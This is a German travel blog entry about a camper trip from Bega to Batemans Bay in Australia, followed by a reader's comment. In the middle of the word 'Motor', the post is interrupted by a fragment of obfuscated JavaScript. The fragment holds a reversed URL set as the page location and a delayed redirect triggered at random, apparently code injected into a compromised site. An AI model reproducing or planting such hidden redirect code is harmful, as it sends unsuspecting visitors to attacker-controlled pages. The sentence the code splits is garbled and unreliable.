Weiter geht’s – 19.07.2016

Es ist halb zwölf und wir können weiterfahren. Wir haben sehr gut im Hotel geschlafen, waren heute morgen noch im beheizten Pool, frisch geduscht, Brötchen mit Ei und Speck gefrühstückt und mit dem öffentlichem Bus wieder nach Bega. An der Bushaltestelle hat uns der Mann von der Werkstatt abgeholt und zum Camper gebracht. ER FÄHRT WIRKLICH! Ich konnte es erst glauben, als wir drin saßen und weiter fuhren. Hier der Beweis:


IMG-20160719-WA0002 IMG-20160719-WA0003

Weil wir einiges an Zeit verloren haben, sind Cooma und Canberra gestrichen. Wer muss auch schon die Hauptstadt sehen, aber sie ist ja eh nur eine: „Wenn zwei sich streiten, freut sich die Dritte“-Hauptstadt. Melbourne und Sydney werden wir ja gesehen haben. So, genug schön geredet. Unser heutiges Ziel war Batemans Bay. Vorher haben wir einen Halt in Narooma gemacht und haben uns den Felsen mit der australischen Flagge angeschaut. Außerdem sollen auf dem Wellenbrecher angeblich Seelöwen und in der Hafenzufahrt Delfine zu sehen sein. Gefunden haben wir leider keine heute.20160719_140821

Anschließend sind wir weiter Richtung Batemans Bay gefahren und haben unsere defekte Gasflasche endlich tauschen können. Jetzt funktioniert unser Mobilheim wieder (fast) komplett. Der Fensterheber auf der linken Seite funktioniert nicht mehr, seitdem der Camper aus der Werkstatt zurück gekommen ist. Das ist aber mittlerweile meckern auf hohem Niveau. Der Motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor läuft ja. Und wie er läuft, seht ihr ja auf der Karte:

2 Gedanken zu „Weiter geht’s – 19.07.2016“

  1. Hallo Urlauber,
    schön, dass es wieder weiter geht. Wünschen euch, dass es bei dieser einen Panne bleibt.
    In Coffs Harbour haben wir damals 3 Tage Stopp gemacht und einen Sandkastenfreund meiner Mutter besucht, der Anfang der 60 iger Jahre ausgewandert war.
    Schaut mal, ob ihr dort “ The Big Banana “ findet.
    sonnige Grüße aus Kempen,
    Irene und Wolfgang

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert